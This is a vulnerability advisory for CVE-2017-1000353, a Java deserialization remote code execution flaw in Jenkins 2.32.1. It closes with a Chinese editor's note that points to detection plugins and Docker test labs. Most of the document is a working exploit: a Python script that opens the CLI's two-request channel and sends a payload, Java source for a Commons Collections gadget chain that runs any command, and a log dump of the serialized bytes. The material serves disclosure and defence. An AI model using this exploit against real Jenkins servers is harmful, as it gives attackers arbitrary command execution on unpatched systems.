Jenkins Java Deserialization Remote Code Execution Vulnerability (CVE-2017-1000353)

#### **Vulnerability Summary** The following advisory describes Java deserialization vulnerability found in CloudBees Jenkins version 2.32.1 that leads to a Remote Code Execution. Jenkins helps to automate the non-human part of the whole software development process with now common things like continuous integration and by empowering teams to implement the technical aspects of continuous delivery. It is a server-based system running in a servlet container such as Apache Tomcat. It supports version control tools, including AccuRev, CVS, Subversion, Git, Mercurial, Perforce, Clearcase and RTC, and can execute Apache Ant, Apache Maven and sbt based projects as well as arbitrary shell scripts and Windows batch commands. **Credit** An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. **Vendor Response** CloudBees Jenkins has released patches to address this vulnerability and issued CVE-2017-1000353 for the vulnerability. For more details: [https://jenkins.io/security/advisory/2017-04-26](https://jenkins.io/security/advisory/2017-04-26)/ #### **Vulnerability Details** Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent. The vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands. The first request starts a session for the bi-directional channel and is used for “_downloading_” data from the server. The HTTP header “_Session_” is the identifier for the channel. The HTTP header “_Side_” specifies the “_downloading/uploading_” direction.  The second request is the sending component of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the “_Session_” HTTP header which is just a UUID.  All commands sent to the CLI start with a preamble which is often: ``` <===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4= ``` The preamble contains a base64 encoded serialized object. The serialized object of type “Capability” just tells the server which capabilities (e.g. HTTP chunked encoding) the client has. After the preamble and some additional bytes a serialized object of type Command is expected by the Jenkins server. Since Jenkins does not validate the serialized object, any serialize object can be sent. The deserialization is code is in the method “readFrom” of class “Command”:  The command is called by the “_read()_” of class “_ClassicCommandTransport_”.  The data coming “_from_” the “_upload_”-side of the channel is read in a thread of type ReaderThread.  The thread is triggered by the “_upload_”-method which is called in class “_CliEndpointResponse_”.  In that method the HTTP body data is read and the “notify” method is called to notify the thread.  **Proof of Concept** In order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script. The second step is to change python script jenkins_poc1.py: * Adjust target url in URL variable * Change file to open in line “FILE_SER = open(“jenkins_poc1.ser”, “rb”).read()” to your payload file. By doing the previous steps, you should see the following massage in the log/stdout of jenkins: ``` Jan 26, 2017 2:22:41 PM hudson.remoting.SynchronousCommandTransport$ReaderThread run SEVERE: I/O error in channel HTTP full-duplex channel a403c455-3b83-4890-b304-ec799bffe582 hudson.remoting.DiagnosedStreamCorruptionException Read back: 0xac 0xed 0x00 0x05 'sr' 0x00 '/org.apache.commons.collections.map.ReferenceMap' 0x15 0x94 0xca 0x03 0x98 'I' 0x08 0xd7 0x03 0x00 0x00 'xpw' 0x11 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 '?@' 0x00 0x00 0x00 0x00 0x00 0x10 'sr' 0x00 '(java.util.concurrent.CopyOnWriteArraySetK' 0xbd 0xd0 0x92 0x90 0x15 'i' 0xd7 0x02 0x00 0x01 'L' 0x00 0x02 'alt' 0x00 '+Ljava/util/concurrent/CopyOnWriteArrayList;xpsr' 0x00 ')java.util.concurrent.CopyOnWriteArrayListx]' 0x9f 0xd5 'F' 0xab 0x90 0xc3 0x03 0x00 0x00 'xpw' 0x04 0x00 0x00 0x00 0x02 'sr' 0x00 '*java.util.concurrent.ConcurrentSkipListSet' 0xdd 0x98 'Py' 0xbd 0xcf 0xf1 '[' 0x02 0x00 0x01 'L' 0x00 0x01 'mt' 0x00 '-Ljava/util/concurrent/ConcurrentNavigableMap;xpsr' 0x00 '*java.util.concurrent.ConcurrentSkipListMap' 0x88 'Fu' 0xae 0x06 0x11 'F' 0xa7 0x03 0x00 0x01 'L' 0x00 0x0a 'comparatort' 0x00 0x16 'Ljava/util/Comparator;xppsr' 0x00 0x1a 'java.security.SignedObject' 0x09 0xff 0xbd 'h*< ' 0xd5 0xff 0x02 0x00 0x03 '[' 0x00 0x07 'contentt' 0x00 0x02 '[B[' 0x00 0x09 'signatureq' 0x00 '~' 0x00 0x0e 'L' 0x00 0x0c 'thealgorithmt' 0x00 0x12 'Ljava/lang/String;xpur' 0x00 0x02 '[B' 0xac 0xf3 0x17 0xf8 0x06 0x08 'T' 0xe0 0x02 0x00 0x00 'xp' 0x00 0x00 0x05 0x01 0xac 0xed 0x00 0x05 'sr' 0x00 0x11 'java.util.HashSet' 0xba 'D' 0x85 0x95 0x96 0xb8 0xb7 '4' 0x03 0x00 0x00 'xpw' 0x0c 0x00 0x00 0x00 0x02 '?@' 0x00 0x00 0x00 0x00 0x00 0x01 'sr' 0x00 '4org.apache.commons.collections.keyvalue.TiedMapEntry' 0x8a 0xad 0xd2 0x9b '9' 0xc1 0x1f 0xdb 0x02 0x00 0x02 'L' 0x00 0x03 'keyt' 0x00 0x12 'Ljava/lang/Object;L' 0x00 0x03 'mapt' 0x00 0x0f 'Ljava/util/Map;xpt' 0x00 0x06 'randomsr' 0x00 '*org.apache.commons.collections.map.LazyMapn' 0xe5 0x94 0x82 0x9e 'y' 0x10 0x94 0x03 0x00 0x01 'L' 0x00 0x07 'factoryt' 0x00 ',Lorg/apache/commons/collections/Transformer;xpsr' 0x00 ':org.apache.commons.collections.functors.ChainedTransformer0' 0xc7 0x97 0xec '(z' 0x97 0x04 0x02 0x00 0x01 '[' 0x00 0x0d 'iTransformerst' 0x00 '-[Lorg/apache/commons/collections/Transformer;xpur' 0x00 '-[Lorg.apache.commons.collections.Transformer;' 0xbd 'V*' 0xf1 0xd8 '4' 0x18 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x05 'sr' 0x00 ';org.apache.commons.collections.functors.ConstantTransformerXv' 0x90 0x11 'A' 0x02 0xb1 0x94 0x02 0x00 0x01 'L' 0x00 0x09 'iConstantq' 0x00 '~' 0x00 0x03 'xpvr' 0x00 0x11 'java.lang.Runtime' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpsr' 0x00 ':org.apache.commons.collections.functors.InvokerTransformer' 0x87 0xe8 0xff 'k{|' 0xce '8' 0x02 0x00 0x03 '[' 0x00 0x05 'iArgst' 0x00 0x13 '[Ljava/lang/Object;L' 0x00 0x0b 'iMethodNamet' 0x00 0x12 'Ljava/lang/String;[' 0x00 0x0b 'iParamTypest' 0x00 0x12 '[Ljava/lang/Class;xpur' 0x00 0x13 '[Ljava.lang.Object;' 0x90 0xce 'X' 0x9f 0x10 's)l' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x02 't' 0x00 0x0a 'getRuntimeur' 0x00 0x12 '[Ljava.lang.Class;' 0xab 0x16 0xd7 0xae 0xcb 0xcd 'Z' 0x99 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x00 't' 0x00 0x09 'getMethoduq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.String' 0xa0 0xf0 0xa4 '8z;' 0xb3 'B' 0x02 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x1b 'sq' 0x00 '~' 0x00 0x13 'uq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x02 'puq' 0x00 '~' 0x00 0x18 0x00 0x00 0x00 0x00 't' 0x00 0x06 'invokeuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x02 'vr' 0x00 0x10 'java.lang.Object' 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 'xpvq' 0x00 '~' 0x00 0x18 'sq' 0x00 '~' 0x00 0x13 'ur' 0x00 0x13 '[Ljava.lang.String;' 0xad 0xd2 'V' 0xe7 0xe9 0x1d '{G' 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 't' 0x00 0x05 'xtermt' 0x00 0x04 'execuq' 0x00 '~' 0x00 0x1b 0x00 0x00 0x00 0x01 'q' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x0f 'sr' 0x00 0x11 'java.lang.Integer' 0x12 0xe2 0xa0 0xa4 0xf7 0x81 0x87 '8' 0x02 0x00 0x01 'I' 0x00 0x05 'valuexr' 0x00 0x10 'java.lang.Number' 0x86 0xac 0x95 0x1d 0x0b 0x94 0xe0 0x8b 0x02 0x00 0x00 'xp' 0x00 0x00 0x00 0x01 'sr' 0x00 0x11 'java.util.HashMap' 0x05 0x07 0xda 0xc1 0xc3 0x16 '`' 0xd1 0x03 0x00 0x02 'F' 0x00 0x0a 'loadFactorI' 0x00 0x09 'thresholdxp?@' 0x00 0x00 0x00 0x00 0x00 0x00 'w' 0x08 0x00 0x00 0x00 0x10 0x00 0x00 0x00 0x00 'xxxuq' 0x00 '~' 0x00 0x11 0x00 0x00 0x00 '/0-' 0x02 0x14 'I:aj' 0x01 0xfe 0xe7 'Kh' 0x98 '-' 0x9c 'o!' 0x05 'H' 0x84 0xfa 0xb1 0x82 0x02 0x15 0x00 0x90 0x0a 0x92 0x0d 'x' 0xa2 '~~' 0xdd 0xba 0xa3 0xe8 0xf6 'x\3' 0xcd 0x98 0x06 '*t' 0x00 0x03 'DSAsr' 0x00 0x11 'java.lang.Boolean' 0xcd ' r' 0x80 0xd5 0x9c 0xfa 0xee 0x02 0x00 0x01 'Z' 0x00 0x05 'valuexp' 0x01 'pxsr' 0x00 '1org.apache.commons.collections.set.ListOrderedSet' 0xfc 0xd3 0x9e 0xf6 0xfa 0x1c 0xed 'S' 0x02 0x00 0x01 'L' 0x00 0x08 'setOrdert' 0x00 0x10 'Ljava/util/List;xr' 0x00 'Corg.apache.commons.collections.set.AbstractSerializableSetDecorator' 0x11 0x0f 0xf4 'k' 0x96 0x17 0x0e 0x1b 0x03 0x00 0x00 'xpsr' 0x00 0x15 'net.sf.json.JSONArray]' 0x01 'To\(r' 0xd2 0x02 0x00 0x02 'Z' 0x00 0x0e 'expandElementsL' 0x00 0x08 'elementsq' 0x00 '~' 0x00 0x18 'xr' 0x00 0x18 'net.sf.json.AbstractJSON' 0xe8 0x8a 0x13 0xf4 0xf6 0x9b '?' 0x82 0x02 0x00 0x00 'xp' 0x00 'sr' 0x00 0x13 'java.util.ArrayListx' 0x81 0xd2 0x1d 0x99 0xc7 'a' 0x9d 0x03 0x00 0x01 'I' 0x00 0x04 'sizexp' 0x00 0x00 0x00 0x01 'w' 0x04 0x00 0x00 0x00 0x01 't' 0x00 0x06 'randomxxsq' 0x00 '~' 0x00 0x1e 0x00 0x00 0x00 0x00 'w' 0x04 0x00 0x00 0x00 0x00 'xxq' 0x00 '~' 0x00 ' sq' 0x00 '~' 0x00 0x02 'sq' 0x00 '~' 0x00 0x05 'w' 0x04 0x00 0x00 0x00 0x02 'q' 0x00 '~' 0x00 0x1a 'q' 0x00 '~' 0x00 0x09 'xq' 0x00 '~' 0x00 ' px' Read ahead: at hudson.remoting.FlightRecorderInputStream.analyzeCrash(FlightRecorderInputStream.java:80) at hudson.remoting.ClassicCommandTransport.diagnoseStreamCorruption(ClassicCommandTransport.java:93) at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:75) at hudson.remoting.SynchronousCommandTransport$ReaderThread.run(SynchronousCommandTransport.java:59) Caused by: java.lang.ClassCastException: org.apache.commons.collections.map.ReferenceMap cannot be cast to hudson.remoting.Command at hudson.remoting.Command.readFrom(Command.java:96) at hudson.remoting.ClassicCommandTransport.read(ClassicCommandTransport.java:70) ``` **jenkins_poc1.py** ``` import urllib import requests import uuid import threading import time import gzip import urllib3 import zlib proxies = { # 'http': 'http://127.0.0.1:8090', # 'https': 'http://127.0.0.1:8090', } URL='http://192.168.18.161:8080/cli' PREAMLE='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' PROTO = '\x00\x00\x00\x00' FILE_SER = open("jenkins_poc1.ser", "rb").read() def download(url, session): headers = {'Side' : 'download'} headers['Content-type'] = 'application/x-www-form-urlencoded' headers['Session'] = session headers['Transfer-Encoding'] = 'chunked' r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True) print r.text def upload(url, session, data): headers = {'Side' : 'upload'} headers['Session'] = session headers['Content-type'] = 'application/octet-stream' headers['Accept-Encoding'] = None r = requests.post(url,data=data,headers=headers,proxies=proxies) def upload_chunked(url,session, data): headers = {'Side' : 'upload'} headers['Session'] = session headers['Content-type'] = 'application/octet-stream' headers['Accept-Encoding']= None headers['Transfer-Encoding'] = 'chunked' headers['Cache-Control'] = 'no-cache' r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies) def null_payload(): yield " " def create_payload(): payload = PREAMLE + PROTO + FILE_SER return payload def create_payload_chunked(): yield PREAMLE yield PROTO yield FILE_SER def main(): print "start" session = str(uuid.uuid4()) t = threading.Thread(target=download, args=(URL, session)) t.start() time.sleep(1) print "pwn" #upload(URL, session, create_payload()) upload_chunked(URL, session, "asdf") if __name__ == "__main__": main() ``` **payload.jar** ``` import java.io.FileOutputStream; import java.io.ObjectOutputStream; import java.io.ObjectStreamException; import java.io.Serializable; import java.lang.reflect.Field; import java.security.KeyPair; import java.security.KeyPairGenerator; import java.security.PrivateKey; import java.security.PublicKey; import java.security.Signature; import java.security.SignedObject; import java.util.Comparator; import java.util.HashMap; import java.util.HashSet; import java.util.Map; import java.util.concurrent.ConcurrentSkipListSet; import java.util.concurrent.CopyOnWriteArraySet; import net.sf.json.JSONArray; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.collection.AbstractCollectionDecorator; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections.map.ReferenceMap; import org.apache.commons.collections.set.ListOrderedSet; public class Payload implements Serializable { private Serializable payload; public Payload(String cmd) throws Exception { this.payload = this.setup(cmd); } public Serializable setup(String cmd) throws Exception { final String[] execArgs = new String[] { cmd }; final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; Transformer transformerChain = new ChainedTransformer(transformers); final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); HashSet map = new HashSet(1); map.add("foo"); Field f = null; try { f = HashSet.class.getDeclaredField("map"); } catch (NoSuchFieldException e) { f = HashSet.class.getDeclaredField("backingMap"); } f.setAccessible(true); HashMap innimpl = (HashMap) f.get(map); Field f2 = null; try { f2 = HashMap.class.getDeclaredField("table"); } catch (NoSuchFieldException e) { f2 = HashMap.class.getDeclaredField("elementData"); } f2.setAccessible(true); Object[] array2 = (Object[]) f2.get(innimpl); Object node = array2[0]; if (node == null) { node = array2[1]; } Field keyField = null; try { keyField = node.getClass().getDeclaredField("key"); } catch (Exception e) { keyField = Class.forName("java.util.MapEntry").getDeclaredField( "key"); } keyField.setAccessible(true); keyField.set(node, entry); KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); keyPairGenerator.initialize(1024); KeyPair keyPair = keyPairGenerator.genKeyPair(); PrivateKey privateKey = keyPair.getPrivate(); PublicKey publicKey = keyPair.getPublic(); Signature signature = Signature.getInstance(privateKey.getAlgorithm()); SignedObject payload = new SignedObject(map, privateKey, signature); JSONArray array = new JSONArray(); array.add("asdf"); ListOrderedSet set = new ListOrderedSet(); Field f1 = AbstractCollectionDecorator.class .getDeclaredField("collection"); f1.setAccessible(true); f1.set(set, array); DummyComperator comp = new DummyComperator(); ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp); csls.add(payload); CopyOnWriteArraySet a1 = new CopyOnWriteArraySet(); CopyOnWriteArraySet a2 = new CopyOnWriteArraySet(); a1.add(set); Container c = new Container(csls); a1.add(c); a2.add(csls); a2.add(set); ReferenceMap flat3map = new ReferenceMap(); flat3map.put(new Container(a1), "asdf"); flat3map.put(new Container(a2), "asdf"); return flat3map; } private Object writeReplace() throws ObjectStreamException { return this.payload; } static class Container implements Serializable { private Object o; public Container(Object o) { this.o = o; } private Object writeReplace() throws ObjectStreamException { return o; } } static class DummyComperator implements Comparator, Serializable { public int compare(Object arg0, Object arg1) { // TODO Auto-generated method stub return 0; } private Object writeReplace() throws ObjectStreamException { return null; } } public static void main(String args[]) throws Exception{ if(args.length != 2){ System.out.println("java -jar payload.jar outfile cmd"); System.exit(0); } String cmd = args[1]; FileOutputStream out = new FileOutputStream(args[0]); Payload pwn = new Payload(cmd); ObjectOutputStream oos = new ObjectOutputStream(out); oos.writeObject(pwn); oos.flush(); out.flush(); } } ``` #### **编者注** 目前国内安全社区已经提供了该漏洞的检测插件(巡风 https://github.com/ysrc/xunfeng/ ) ,和基于 `Docker` 的漏洞测试环境 * https://github.com/Medicean/VulApps * https://github.com/phith0n/vulhub